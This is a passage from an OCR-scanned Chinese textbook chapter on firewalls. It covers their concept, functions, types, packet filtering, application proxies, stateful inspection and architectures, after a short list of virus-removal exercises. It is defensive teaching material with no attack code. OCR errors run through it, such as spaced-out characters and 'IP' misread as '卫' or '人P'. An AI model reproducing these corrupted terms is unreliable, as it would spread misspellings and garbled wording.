手动 清除 熊猫 烧香 病毒 。 
手动 清除 QQ 粘 虫 病毒 。 
编写 自动 播放 病毒 2 的 专 杀 工具 。 
编写 能 猫 烧香 病毒 的 专 杀 工具 。 
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【项 目 要 点 】 

防火 墙 的 概念 。 

防火 墙 的 分 类 。 
防火 墙 的 体系 结构 。 
防火 墙 的 主要 技术 。 

【学 习 目 标 】 

@ 掌握 防火 墙 的 有 关 概念 。 

@ 了 解 防火 墙 的 体系 结构 和 主要 技术 。 
@ 了 解 防火 墙 的 应 用 。 


5.1 ”防火墙 概述 


随 着 网 络 的 发 展 ， 网 上 的 资源 也 越 来 越 丰富 ， 网 络 的 开放 性 、 共 享 性 、 互 联 程度 也 
随 之 扩大 。 虽 然 网 络 的 发 展 为 人 们 带 来 了 许多 方便 ， 但 也 带 来 了 更 多 网 络 安全 问题 。 若 想 
保护 网 络 资源 和 设备 的 安全 ， 防 火 墙 技术 是 一 个 非常 重要 的 安全 措施 。 


5.1.1 防火 墙 的 概念 


“防火 墙 ”最初 指 的 是 人 们 使 用 坚固 的 石 块 堆砌 在 木质 结构 房屋 的 周围 ， 以 防止 火灾 
的 发 生 和 萤 延 。 现 在 ， 在 计算 机 网 络 中 ， 借 助 “ 防 火 墙 ”一 词 表示 在 可 信 的 、 安 全 的 内 部 
网 络 和 不 安全 的 外 部 网 络 之 间 的 通信 建立 一 个 屏障 。 

防火 墙 目前 已 经 成 为 保护 计算 机 网 络 安全 的 一 项 技术 性 措施 。 它 是 一 种 隔离 控制 技 
术 ， 在 某 个 机 构 的 网 络 和 不 安全 的 网 络 (如 Intemeb) 之 间 设 置 屏障 ， 阻 止 对 信息 资源 的 非法 
访问 ; 也 可 以 使 用 防火 墙 阻止 重要 信息 从 企业 的 网 络 上 被 非法 输出 ， 如 图 5-1 所 示 。 防 火 
墙 可 以 是 软件 ， 也 可 以 是 硬件 ， 或 者 是 两 者 的 结合 。 通 常 企 业 为 了 维护 内 部 的 信息 系统 安 
全 ， 在 企业 网 和 Internet 间 设 立 防火 墙 ， 它 可 以 允许 或 禁止 一 类 具体 的 IP 地 址 访问 ， 也 可 
以 接收 或 拒绝 TCP/IP 上 的 某 一 类 具体 的 应 用 。 

防火 墙 是 实现 网 络 和 信息 安全 的 基础 设施 ， 任 何 类 型 的 防火 墙 都 应 具有 以 下 的 特性 。 

(1) 防火 墙 是 网 关 型 设备 ， 是 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 流 的 唯一 通 
道 。 只 有 符合 安全 策略 的 数据 流 才能 通过 防火 墙 。 

(2) 防火 墙 最 基本 的 功能 是 确保 网 络 流量 的 合法 性 ， 并 在 此 前 提 下 将 网 络 的 流量 快速 
地 从 一 条 链 路 转发 到 另外 的 链 路 上 去 。 

(3) 防火 墙 自身 应 具有 较 强 的 抗 攻 击 免 疫 力 ， 且 不 能 影响 网 络 信息 的 流通 。 
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图 5-1 防火 墙 示 意图 
5.1.2 防火墙 的 功能 


防火 墙 对 流 经 它 的 网 络 通信 进行 扫描 ， 以 过 滤 掉 一 些 攻击 ， 同 时 可 以 关闭 不 使 用 的 端 
口 或 者 禁止 特定 端口 的 流出 通信 ， 禁 止 来 自 特殊 站 点 的 访问 ， 从 而 防止 来 自 不 明 入 侵 者 的 
所 有 通信 。 

(1) 强化 安全 策略 ， 通 过 对 数据 包 进行 检查 ， 保 护 内 部 网 络 。 通 过 架设 防火 墙 ， 可 以 
制定 安全 规则 ， 要 求 所 有 流量 都 通过 防火 墙 的 监视 和 过 滤 ， 仅 仅 容 许 “ 认 可 的 ”和 符合 规 
则 的 请 求 通过 防火 墙 。 例 如 ， 防 火 墙 可 以 禁止 某 些 易 受 攻击 的 服务 (如 NFS、HTTP 等 )， 
这 样 可 以 让 外 来 攻击 者 无 法 利用 这 些 服务 进行 攻击 ， 同 时 内 部 网 络 仍然 可 以 使 用 这 些 比较 
有 用 的 服务 ， 防 火 墙 可 以 限定 内 外 访问 者 只 可 以 访问 服务 器 的 相应 端口 ， 防 止 黑 客 利 用 端 
口 扫描 、Ping 攻击 、SYN Flooding 攻击 等 对 服务 器 进行 攻击 ， 从 而 导致 计算 机 或 网 络 设 
备 肝 省。 

(2) 强化 网 络 安全 策略 。 如 果 一 个 内 部 网 的 所 有 或 大 部 分 需要 进行 安全 保护 的 系统 都 
集中 地 放 在 防火 墙 系统 中 ， 而 不 是 分 散 到 每 个 主机 中 进行 配置 ， 就 可 以 通过 防火 墙 进行 集 
中 保护 ， 安 全 和 管理 成 本 也 就 相应 地 降低 了 。 

(3) 对 内 、 外 部 网 络 存储 和 访问 进行 监控 和 审计 。 如 果 所 有 的 访问 都 经 过 防火 墙 ， 那 
么 防火 墙 就 能 进行 日 志 记 录 ， 同 时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 每 当 发 生 可 疑 动作 
时 ， 防 火 墙 能 进行 适当 的 报警 ， 并 提供 网 络 是 否 受到 监测 和 攻击 的 详细 信息 。 通 过 这 些 记 
录 ， 可 以 发 现 、 跟 踪 、 定 位 非法 的 用 户 访问 和 攻击 。 一 旦 发 现 黑客 ， 管 理 员 可 以 进行 有 效 
的 组 织 ， 还 可 以 更 进一步 跟踪 以 确定 黑客 身份 并 收集 作案 证 据 。 这 能 为 网 络 管理 人 员 提 供 
非常 重要 的 安全 管理 信息 ， 可 以 使 管理 员 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 的 探测 和 攻击 ， 
并 且 清楚 防火 墙 的 控制 是 否 充足 。 

(4) 支持 网 络 地址 转换 。 网 络 地 址 转换 是 指 在 局 域 网 内 部 使 用 私有 卫 地址， 而 当 内 部 
用 户 要 与 外 部 网 络 进行 通信 时 ， 就 在 网 络 出 口 处 将 私有 IP 地 址 替换 成 公用 卫 地 址 。 因 
此 ， 在 防火 墙 上 实现 网 络 地 址 转换 ， 可 以 缓解 人 P 地 址 空间 短缺 的 问题 ， 并 屏蔽 内 部 网 络 的 
结构 和 信息 ， 保 证 内 部 网 络 的 稳定 性 和 安全 性 。 

(5) 隔离 不 同 网 络 ， 防 止 内 部 信息 的 外 泄 。 防 火 墙 通过 隔离 内 、 外 部 网 络 来 确保 内 部 
网 络 的 安全 。 这 也 限制 了 局 部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 内 部 网 络 
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中 一 个 不 引 人 注 意 的 细节 可 能 包含 了 有 关 安 全 的 线索 而 引起 外 部 攻击 者 的 兴趣 ， 甚 至 因此 
暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 墙 ， 就 可 以 隐蔽 透露 内 部 细节 的 服务 。 如 
Finger( 用 来 查询 使 用 者 的 资料 ) 显 示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 、 最 后 登录 时 间 和 使 
用 Shell 类 型 等 。 但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 截获 ， 攻 击 者 通过 所 获取 的 信 
息 可 以 知道 一 个 系统 使 用 的 频繁 程度 ， 这 个 系统 是 否 有 用 户 正在 连 线 上 网 等 信息 。 防 火 墙 
可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 ， 这 样 一 台 主机 的 域名 和 IP 地 址 就 不 会 被 外 界 
所 了 解 。 

防火 墙 本 身 也 有 局 限 性 ， 不 能 防范 所 有 的 网 络 安全 问题 ， 如 不 能 防范 不 经 过 防火 墙 的 
攻击 ， 不 能 防止 已 感染 病毒 的 文件 和 软件 在 网 络 上 进行 传送 。 同 时 为 保证 网 络 安全 性 ， 防 
火 墙 会 限制 或 关闭 很 多 有 用 的 端口 和 服务 ， 也 带 来 了 使 用 过 程 中 的 麻烦 。 


5.1.3 防火墙 的 分 类 


按照 不 同 的 标准 ， 防 火 墙 进行 可 以 进行 不 同 的 分 类 。 
1. 按照 防火 墙 软 硬 件 的 实现 形态 分 类 


(1) 软件 防火 墙 。 软 件 防火 墙 运行 于 特定 的 计算 机 上 ,， 需 要 客户 预先 安装 好 的 计算 机 
操作 系统 的 支持 ， 一 般 来 说 这 台 计 算 机 就 是 整个 网 络 的 网 关 ， 俗 称 “ 个 人 防火 墙 ”。 软 件 
防火 墙 就 像 其 他 软件 产品 一 样 ， 需 要 先 在 计算 机 上 安装 并 做 好 配置 才 可 以 使 用 。 

(2) 硬件 防火 墙 。 硬 件 防火 墙 是 由 防火 墙 软件 和 运行 该 软件 的 特定 计算 机 构成 的 防火 
墙 。 目 前 市 场 上 大 多 数 防 火 墙 都 是 这 种 所 谓 的 硬件 防火 墙 ， 它 们 都 基于 PC 架构 ， 和 普通 
家 庭 用 的 PC 没有 太 大 区 别 。 在 这 些 PC 架构 计算 机 上 ， 一 般 运行 经 过 裁剪 和 简化 的 操作 
系统 ， 最 常用 的 有 老 版 本 的 UNIX、Linux 和 FreeBSD 系统 。 

(3) 芯片 级 防火 墙 。 芯 片 级 防火 墙 基于 专门 的 硬件 平台 ， 没 有 操作 系统 。 专 有 的 ASIC 
芯片 使 它们 比 其 他 种 类 的 防火 墙 速度 更 快 ， 处 理 能 力 更 强 ， 性 能 更 高 。 这 类 防火 墙 本 身 的 
漏洞 比较 少 ， 不 过 价格 相对 比较 高 昂 。 


2. 按照 防火 墙 在 网 络 协议 栈 进行 过 滤 的 层次 分 类 


(1) 包 过 滤 防 火 墙 。 包 过 滤 防 火 墙 工作 在 OSI 网 络 参考 模型 的 网 络 层 和 传输 层 ， 可 以 
获取 也 层 和 TCP 层 信息 ， 也 可 以 获取 应 用 层 信 息 。 它 根据 数据 报 报头 源 地 址 、 目 的 地 
址 、 端 口号 和 协议 类 型 等 标志 确定 是 否 允许 其 通过 。 只 有 满足 过 滤 条 件 的 数据 报 才 被 转发 
到 相应 的 目的 地 ， 其 余数 据 报 则 被 从 数据 流 中 丢弃 。 

包 过 滤 技 术 的 优点 是 简单 实用 ， 实 现成 本 较 低 ， 在 应 用 环境 比较 简单 的 情况 下 ， 能 够 
以 较 小 的 代价 在 一 定 程度 上 保证 系统 的 安全 。 但 包 过 滤 技 术 无 法 识别 基于 应 用 层 的 恶意 侵 
入 ， 如 恶意 的 Java 小 程序 以 及 电子 邮件 中 附带 的 病毒 。 有 经 验 的 黑客 很 容易 伪造 卫 地 
址 ， 骗 过 包 过 滤 型 防火 墙 。 

(2) 电路 级 网 关 防火 墙 。 电 路 级 网 关 防火 墙 用 来 监控 内 部 网 络 服务 器 与 不 受信 任 的 外 
部 主机 间 的 TCP 握手 信息 ， 以 此 来 决定 该 会 话 是 否 合法 。 电 路 级 网 关 是 在 OSI 模型 的 会 
话 层 上 过 滤 数 据 报 ， 其 层次 比 包 过 滤 防 火 墙 高 。 

(3) 应 用 层 网 关 防 火 墙 。 应 用 层 网 关 防 火 墙 工作 在 OSI 的 最 高 层 应 用 层 。 它 通过 对 每 
一 种 应 用 服务 编制 专门 的 代理 程序 ， 实 现 监视 和 控制 应 用 层 通 信 流 的 功能 。 由 于 应 用 级 网 
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关 能 够 理解 应 用 层 协 议 ， 能 够 做 一 些 复杂 的 访问 控制 ， 可 执行 比较 精细 的 日 志和 和 审核， 并 
且 能 够 对 数据 报 进行 分 析 并 形成 相关 的 安全 报告 。 但 是 因为 每 一 种 协议 需要 相应 的 代理 软 
件 ， 所 以 应 用 层 网 关 防 火 墙 工作 量 大 ， 效 率 不 如 其 他 两 种 防火 墙 高 。 

3. 按照 防火 墙 在 网 络 中 的 应 用 部 署 位 置 分 类 


(1) 边界 防火 墙 。 边 界 防火 墙 位 于 内 部 网 络 和 外 部 网 络 的 边界 ， 对 内 部 网 络 和 外 部 网 
络 实施 隔离 ， 保 护 内 部 网 络 。 这 类 防火 墙 一 般 至 少 是 硬件 防火 墙 ， 吞 吐 量 大 ， 性 能 较 好 。 

(2) 个 人 防火 墙 。 个 人 防火 墙 安 装 在 单 台 主机 中 ， 也 只 是 保护 单 台 主机 。 这 类 防火 墙 
用 于 个 人 用 户 和 企业 内 部 的 主机 ， 通 常 为 软件 防火 墙 。 

(3) 混合 式 防火 墙 。 混 合式 防火 墙 是 一 整套 防火 墙 系统 ， 由 若干 软 、 硬 件 组 件 ， 分 布 
于 内 部 网 络 和 外 部 网 络 的 边界 、 内 部 网 络 各 主机 之 间 ， 既 对 内 部 网 络 和 外 部 网 络 之 间 通 信 
进行 过 滤 ， 又 对 网 络 内 部 各 主机 间 的 通信 进行 过 滤 。 这 类 防火 墙 的 性 能 较 好 ， 但 部 署 较 为 
复杂 。 


5.2 防火墙 的 主要 技术 


防火 墙 技术 的 发 展 经 历 了 一 个 从 简单 到 复杂 ， 并 不 断 借鉴 和 融合 其 他 网 络 技术 的 过 
程 。 防 火 墙 技术 是 一 种 综合 技术 ， 主 要 包括 包 过 滤 技 术 、 应 用 代理 技术 、 状 态 检测 技术 
等 。 随 着 网 络 安全 技术 和 防火 墙 技术 的 发 展 ， 人 们 开始 将 虚拟 专用 网 VPN、 防 病毒 、 入 侵 
检测 、URL 过 滤 及 内 容 过 滤 等 技术 加 入 到 防火 墙 当中 ， 形 成 整体 防御 系统 。 


5.2.1 包 过 滤 技 术 


1. 包 过 滤 原 理 


包 过 滤 是 最 早 使 用 的 一 种 防火 墙 技术 ， 包 过 滤 防 火 墙 工作 在 OSI 参考 模型 的 网 络 层 和 
传输 层 。 网 络 上 的 数据 都 是 采用 “ 包 ” 的 形式 进行 传输 的 ， 数 据 被 划分 为 一 定 大 小 的 数据 
包 。 数 据 包 过 滤 是 通过 对 数据 包 的 IP 头 和 TCP 头 或 UDP 头 中 包含 的 源 了 地 址 、 目 的 卫 
地 址 、 源 端口 、 目 的 端口 、 协 议 类 型 等 信息 进行 数据 包 检 查 ， 判 断 是 否 允 许 数据 包 通 过 。 
只 有 满足 过 滤 条 件 的 数据 包 才 被 转发 到 相应 的 目的 地 ， 其 余数 据 包 则 被 从 数据 流 中 丢弃 。 

包 过 滤 设 备 可 以 是 路 由 器 、 网 桥 或 计算 机 ， 一 般 使 用 包 过 滤 路 由 器 。 包 过 滤 路 由 器 与 
普通 的 路 由 器 有 所 不 同 。 普 通 的 路 由 器 只 检查 数据 包 的 目标 地 址 ， 并 选择 一 个 达到 目的 地 
址 的 最 佳 路 径 。 它 处 理 数据 包 是 以 目标 地 址 为 基础 的 ， 存 在 着 两 种 可 能 性 : 若 路 由 器 可 以 
找到 一 个 路 径 到 达 目 标 地 址 ， 则 发 送出 去 ; 若 路 由 器 不 知道 如 何 发 送 数据 包 ， 则 通知 数据 
包 的 发 送 者 “数据 包 不 可 达 ”。 而 包 过 滤 路 由 器 会 更 仔细 地 检查 数据 包 ， 除 了 决定 是 否 有 
到 达 目 标 地 址 的 路 径 外 ， 还 要 决定 是 否 应 该 发 送 数据 包 。“ 应 该 与 否 ” 是 由 路 由 器 的 过 滤 
策略 (ACL 访问 列表 ) 决 定 并 强行 执行 的 。 路 由 器 的 主要 过 滤 策 略 如 下 。 

(1) 拒绝 来 自 某 主机 或 某 网 段 的 所 有 连接 。 

(2) 允许 来 自 某 主机 或 某 网 段 的 所 有 连接 。 

(3) 拒绝 来 自 某 主机 或 某 网 段 的 指定 端口 的 连接 。 

(4) 允许 来 自 某 主 机 或 某 网 段 的 指定 端口 的 连接 。 
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(5) 拒绝 本 地 主机 或 网 络 与 其 他 主机 或 网 络 的 所 有 连接 。 

(6) 允许 本 地 主机 或 网 络 与 其 他 主机 或 网 络 的 所 有 连接 。 

(7) 拒绝 本 地 主机 或 网 络 与 其 他 主机 或 网 络 指定 端口 的 连接 。 

(8) 允许 本 地 主机 或 网 络 与 其 他 主机 或 网 络 指定 端口 的 连接 。 

包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 因 为 它 不 是 针对 某 个 具体 的 网 络 服 
务 采取 特殊 的 处 理 方式 ， 适 用 于 所 有 网 络 服务 ， 并 且 大 多 数 路 由 器 都 提供 数据 包 过 滤 功 
能 ， 它 能 很 大 程度 上 满足 绝 大 多 数 企 业 的 安全 要 求 。 

在 整个 防火 墙 技术 的 发 展 过 程 中 ， 包 过 滤 技 术 第 一 代 模 型 是 “静态 包 过 滤 ”(Static 
Packet Filtering)。 这 种 类 型 的 防火 墙根 据 定 义 好 的 过 滤 规 则 审查 每 个 数据 包 ， 以 便 确 定 其 
是 否 与 某 一 条 包 过 滤 规 则 匹配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制订 。 报 头 信息 中 包 
括 IP 源 地 址 、IP 目标 地 址 、 传 输 协议 (TCP、UDP、ICMP 等 )、TCP/UDP 目标 端口 、 
ICMP 消息 类 型 等 。 包 过 滤 类 型 的 防火 墙 要 遵循 的 一 条 基本 原则 是 “最 小 特权 原则 ”， 即 
明确 允许 希望 通过 的 数据 包 ， 禁 止 其 他 的 数据 包 。 静 态 包 过 滤 需 要 事先 定义 好 ， 如 果 防 火 
墙 使 用 的 环境 和 网 络 需 要 加 入 新 的 规则 ， 就 需要 全 部 重新 定义 。 静 态 包 过 滤 的 原理 如 图 5-2 
所 示 。 





5-2 静态 包 过 滤 原 理 


第 二 代 包 过 滤 防 火 墙 技术 是 “动态 包 过 滤 ”， 这 种 类 型 的 防火 墙 采用 动态 设置 包 过 滤 
规则 的 方法 ， 避 免 了 静态 包 过 滤 所 具有 的 问题 。 这 种 技术 后 来 发 展 成 为 包 状 态 监 测 
(Stateful Inspection) 技 术 。 采 用 这 种 技术 的 防火 墙 对 通过 其 建立 的 每 一 个 连接 都 进行 跟踪 ， 
并 且 根 据 需要 可 动态 地 在 过 滤 规 则 中 增加 或 更 新 条 目 。 动 态 包 过 滤 技 术 原理 如 图 5-3 所 示 。 





图 5-3 动态 包 过 滤 原 理 
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2. 包 过 滤 技 术 的 优点 


(1) 对 于 一 个 小 型 的 、 不 太 复杂 的 站 点 ， 包 过 滤 比 较 容易 实现 。 

(2) 因为 过 滤 路 由 器 工作 在 瑟 层 和 TCP 层 ， 所 以 处 理 包 的 速度 比 代理 服务 器 快 。 

(3) 过 滤 路 由 器 为 用 户 提供 了 一 种 透明 的 服务 ， 用 户 不 需要 改变 客户 端的 任何 应 用 程 
序 ， 也 不 需要 用 户 学 习 任何 新 的 东西 。 因 为 过 滤 路 由 器 工作 在 人 P 层 和 TCP 层 ， 而 IP 层 和 
TCP 层 与 应 用 层 的 问题 毫 不 相关 。 所 以 ， 过 滤 路 由 器 有 时 也 被 称 为 “ 包 过 滤 网 关 ” 或 “ 透 
明 网 关 ”。 

(4) 过 滤 路 由 器 在 价格 上 一 般 比 代理 服务 器 便宜 。 


3. 包 过 滤 技 术 的 缺点 


(1) 一 些 包 过 滤 网 关 不 支持 有 效 的 用 户 认证 。 

(2) 规则 表 很 快 会 变 得 很 大 而 且 复杂 ， 规 则 很 难 测试 。 随 着 表 的 增 大 和 复杂 性 的 增 
加 ， 规 则 结构 出 现 漏洞 的 可 能 性 也 会 增加 。 

(3) 包 过 滤 防 火 墙 最 大 的 缺陷 是 它 依赖 一 个 单一 的 部 件 来 保护 系统 。 如 果 这 个 部 件 出 
现 了 问题 ， 会 使 得 网 络 大 门 敞开 ， 而 用 户 甚至 可 能 还 不 知道 。 

(4) 在 一 般 情 况 下 ， 如 果 外 部 用 户 被 允许 访问 内 部 主机 ， 则 它 就 可 以 访问 内 部 网 上 的 
任何 主机 。 

(5) 包 过 滤 防 火 墙 只 能 阻止 一 种 类 型 的 IP 欺骗 ， 即 外 部 主机 伪装 内 部 主机 的 IP; 对 于 
外 部 主机 伪装 外 部 主机 的 外 欺骗 却 不 可 能 阻止 ， 而 且 它 不 能 防止 DNS 欺骗 。 


5.2.2 ”应 用 代理 技术 


由 于 包 过 滤 技 术 无 法 提供 完善 的 数据 保护 措施 ， 而 且 一 些 特殊 的 报 文 攻 击 仅仅 使 用 过 
滤 的 方法 并 不 能 消除 危害 (如 SYN 攻击 、ICMP 泛 洪 等 )， 因 此 人 们 需要 一 种 更 全 面 的 防火 
墙 保护 技术 。 在 这 样 的 需求 背景 下 ， 采 用 “应 用 代理 ”(Application Proxy) 技 术 的 防火 墙 诞 
生 了 。 代 理 服 务 器 作为 一 个 为 用 户 保密 或 者 突破 访问 限制 的 数据 转发 通道 ， 在 网 络 上 应 用 
广泛 。 一 个 完整 的 代理 设备 包含 一 个 服务 端 和 客户 端 ， 服 务 端 接收 来 自用 户 的 请 求 ， 调 用 
自身 的 客户 端 模拟 一 个 基于 用 户 请 求 的 连接 到 目标 服务 器 ， 再 把 目标 服务 器 返回 的 数据 转 
发 给 用 户 ， 完 成 一 次 代理 工作 过 程 。 

“应 用 代理 ”防火 墙 实 际 上 是 一 台 小 型 的 带 有 数据 检测 过 滤 功 能 的 透明 代理 服务 器 
(Transparent Proxy)， 但 是 它 并 不 是 单纯 地 在 一 个 代理 设备 中 嵌入 包 过 滤 技术 ， 而 是 一 种 被 
称 为 “应 用 协议 分 析 (Application Protocol Analysis)” 的 技术 。“ 应 用 协议 分 析 ” 技 术 工 作 
在 OSI 模型 的 最 高 层 一 一 应 用 层 上 ， 在 这 一 层 里 能 接触 到 的 所 有 数据 都 是 最 终 形式 ， 也 就 
是 说 ， 防 火 墙 “看 到 ”的 数据 和 我 们 看 到 的 是 一 样 的 ， 而 不 是 一 个 个 带 着 地 址 端口 协议 等 
原始 内 容 的 数据 包 ， 因 而 它 可 以 实现 更 高 级 的 数据 检测 过 程 。 整 个 代理 防火 墙 把 自身 映射 
为 一 条 透明 线路 ， 在 用 户 方 和 外 界线 路 看 来 ， 它 们 之 间 的 连接 并 没有 任何 阻碍 ， 但 是 这 个 
连接 的 数据 收发 实际 上 是 经 过 了 代理 防火 墙 转向 的 ， 当 外 界 数据 进入 代理 防火 墙 的 客户 端 
时 ，“ 应 用 协议 分 析 ” 模 块 便 根据 应 用 层 协 议 处 理 这 个 数据 ， 通 过 预 置 的 处 理 规则 查询 这 
个 数据 是 否 带 有 危害。 由 于 这 一 层面 对 的 已 经 不 再 是 组 合 有 限 的 报 文 协议 ， 所 以 防火 墙 不 
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仅 能 根据 数据 层 提供 的 信息 判断 数据 ， 更 能 像 管 理 员 分 析 服 务 器 日 志 那 样 “ 看 ”内 容 辩 危 
害 。 而 且 由 于 工作 在 应 用 层 ， 防 火 墙 还 可 以 实现 双向 限制 ， 在 过 滤 外 部 网 络 有 害 数据 的 同 
时 也 监控 着 内 部 网 络 的 信息 ， 管 理 员 可 以 配置 防火 墙 实 现 一 个 身份 验证 和 连接 时 限 的 功 
能 ， 进 一 步 防 止 内 部 网 络 信息 泄露 的 隐患 。 最 后 ， 由 于 代理 防火 墙 采取 代理 机 制 ， 内 外 部 
网 络 之 间 的 通信 都 需 先 经 过 代理 服务 器 审核 ， 通 过 后 再 由 代理 服务 器 连接 ， 不 会 给 分 隔 在 
内 外 部 网 络 两 边 的 计算 机 直接 会 话 的 机 会 ， 可 以 避免 入 侵 者 使 用 “数据 驱动 ”攻击 方式 渗 
透 内 部 网 络 ， 可 以 说 ，“ 应 用 代理 ”是 比 包 过 滤 技术 更 完善 的 防火 墙 技术 。 应 用 代理 防火 
墙 工作 原理 如 图 5-4 所 示 。 





5-4 ”代理 防火 墙 工作 原理 


在 代理 型 防火 墙 技术 的 发 展 过 程 中 ， 它 也 经 历 了 两 个 不 同 的 版 本 ， 即 第 一 代 应 用 网 关 
型 代理 防火 墙 和 第 二 代 自 适应 代理 防火 墙 。 第 一 代 应 用 网 关 (Application Gateway) 型 防火 墙 
通过 一 种 代理 (Proxy) 技 术 参 与 到 一 个 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 这 样 的 
防火 墙 处 理 后 ， 就 好 像 是 源 于 防火 墙 外 部 网 卡 一 样 ， 从 而 可 以 达到 隐藏 内 部 网 络 结构 的 作 
用 。 这 种 类 型 的 防火 墙 被 网 络 安全 专家 和 媒体 公认 为 是 最 安全 的 防火 墙 。 它 的 核心 技术 就 
是 代理 服务 器 技术 。 第 二 代 自 适应 代理 (Adaptive Proxy) 型 防火 墙 可 以 结合 代理 型 防火 墙 的 
安全 性 和 包 过 滤 防 火 墙 的 高 速度 等 优点 ， 在 毫 不 损失 安全 性 的 基础 之 上 将 代理 型 防火 墙 的 
性 能 提高 10 倍 以 上 。 组 成 这 种 类 型 防火 墙 的 基本 要 素 有 两 个 : 自 适 应 代理 服务 器 
(Adaptive Proxy Serven) 与 动态 包 过 滤器 (Dynamic Packet Filter)。 在 自 适应 代理 服务 器 与 动 
态 包 过 滤器 之 间 存 在 一 个 控制 通道 。 在 对 防火 墙 进行 配置 时 ， 用 户 仅仅 将 所 需要 的 服务 类 
型 、 安 全 级 别 等 信息 通过 相应 Proxy 的 管理 界面 进行 设置 就 可 以 了 。 然 后 ， 自 适应 代理 就 
可 以 根据 用 户 的 配置 信息 ， 决 定 是 使 用 代理 服务 从 应 用 层 代 理 请 求 还 是 从 网 络 层 转发 
包 。 如 果 是 后 者 ， 它 将 动态 地 通知 包 过 滤器 增 减 过 滤 规 则 ， 满 足 用 户 对 速度 和 安全 性 的 
双重 要 求 。 
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代理 防火 墙 的 主要 优点 如 下 。 


(1) 代理 防火 墙 可 以 针对 应 用 层 进行 检测 和 扫描 ， 可 有 效 地 防止 应 用 层 的 恶意 入 侵 和 
病毒 。 

(2) 代理 防火 墙 具有 较 高 的 安全 性 。 每 一 个 内 外 网 络 之 间 的 连接 都 要 通过 代理 服务 器 
的 介入 和 转换 ， 而 且 在 代理 防火 墙 上 会 针对 每 一 种 网 络 应 用 (如 HITP) 使 用 特定 的 应 用 程序 
来 处 理 。 

代理 防火 墙 的 主要 缺点 如 下 。 

(1) 实现 起 来 比较 复杂 。 

(2) 需要 特定 的 硬件 支持 。 

(3) 增加 了 服务 的 延迟 。 对 系统 的 整体 性 能 有 较 大 的 影响 ， 系 统 的 处 理 效率 会 有 所 下 
降 ， 因 为 代理 型 防火 墙 对 数据 包 进行 内 部 结构 的 分 析 和 处 理 ， 这 会 导致 数据 包 的 吞吐 能 力 
降低 ( 低 于 包 过 滤 防 火 墙 )。 


5.2.3 ”状态 检测 技术 


状态 检测 技术 是 继 包 过 滤 技 术 和 应 用 代理 技术 后 发 展 的 防火 墙 技术 ， 它 是 CheckPoint 
技术 公司 在 基于 包 过 滤 原 理 的 动态 包 过 滤 技 术 发 展 而 来 的 ， 与 之 类 似 的 有 其 他 厂商 联合 发 
展 的 “深度 包 检测 (Deep Packet Inspection)” 技 术 。 这 种 防火 墙 技术 通过 一 种 被 称 为 “状态 
监视 ”的 模块 ， 在 不 影响 网 络 正常 工作 的 前 提 下 采用 抽取 相关 数据 的 方法 对 网 络 通信 的 各 
个 层次 进行 检测 ， 并 根据 各 种 过 滤 规 则 作出 安全 决策 。 

“状态 检测 (Stateful Inspection)” 技 术 在 保留 了 对 每 个 数据 包 的 头 部 、 协 议 、 地 址 、 端 
口 、 类 型 等 信息 进行 分 析 的 基础 上 ， 进 一 步 发 展 了 “会 话 过 滤 (Session Filtering)” 功 能 ， 在 
每 个 连接 建立 时 ， 防 火 墙 会 为 这 个 连接 构造 一 个 会 话 状态 ， 里 面包 含 了 这 个 连接 数据 包 的 
所 有 信息 ， 以 后 这 个 连接 都 基于 这 个 状态 信息 进行 。 这 种 检测 的 高 明之 处 是 能 对 每 个 数据 
包 的 内 容 进行 监视 ， 一 旦 建立 了 一 个 会 话 状态 ， 则 此 后 的 数据 传输 都 要 以 此 会 话 状态 作为 
依据 ， 例 如 一 个 连接 的 数据 包 源 端口 是 8000， 那 么 在 以 后 的 数据 传输 过 程 中 ， 防 火 墙 都 会 
审核 这 个 包 的 源 端口 还 是 不 是 8000， 否 则 这 个 数据 包 就 被 拦截 ， 而 且 会 话 状态 的 保留 是 有 
时 间 限 制 的 ， 在 超时 的 范围 内 如 果 没 有 再 进行 数据 传输 ， 这 个 会 话 状态 就 会 被 丢弃 。 状 态 
检测 可 以 对 包 内 容 进 行 分 析 ， 从 而 摆脱 了 传统 防火 墙 仅 局 限于 检测 几 个 包头 部 信息 的 弱 
点 ， 而 且 这 种 防火 墙 不 必 开 放 过 多 端口 ， 进 一 步 杜绝 了 可 能 因为 开放 端口 过 多 而 带 来 的 
安全 隐患 。 

由 于 状态 检测 技术 相当 于 结合 了 包 过 滤 技 术 和 应 用 代理 技术 ， 因 此 是 最 先进 的 。 但 是 
由 于 实现 技术 复杂 ， 在 实际 应 用 中 还 不 能 做 到 真正 完全 有 效 的 数据 安全 检测 ， 而 且 在 一 般 
的 计算 机 硬件 系统 上 很 难 设计 出 基于 此 技术 的 完善 防御 措施 。 


5.3 防火墙 的 体系 结构 


目前 ， 防 火 墙 的 体系 结构 一 般 有 屏蔽 路 由 器 体系 结构 、 双 宿主 机 网 关 体 系 结构 、 被 屏 
蔽 主机 体系 结构 和 被 屏蔽 子 网 体系 结构 4 种。 
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5.3.1 屏蔽 路 由 器 体系 结构 


屏蔽 路 由 器 可 以 由 厂家 专门 生产 的 路 由 器 实现 ， 也 可 以 用 主机 来 实现 。 屏 蔽 路 由 器 作 
为 内 外 连接 的 唯一 通道 ， 要 求 所 有 的 报 文 都 必须 在 此 通过 检查 。 路 由 器 上 可 以 安装 基于 人 P 
层 的 报 文 过 滤 软件 ， 实 现 报 文 过 滤 功 能 。 许 多 路 由 器 本 身 带 有 报 文 过 滤 配 置 选项 ， 但 一 般 
比较 简单 。 单纯 由 屏蔽 路 由 器 构成 的 防火 墙 的 危险 包括 路 由 器 本 身 及 路 由 器 允许 访问 的 主 
机 。 屏 蔽 路 由 器 的 缺点 是 一 旦 被 攻击 后 很 难 发 现 ， 而 且 不 能 识别 不 同 的 用 户 。 


5.3.2” 双 宿主 机 网 关 体系 结构 


任何 拥有 多 个 接口 卡 的 系统 都 被 称 为 多 宿 的 ， 双 宿主 机 网 关 是 用 一 台 装 有 两 块 网 卡 的 
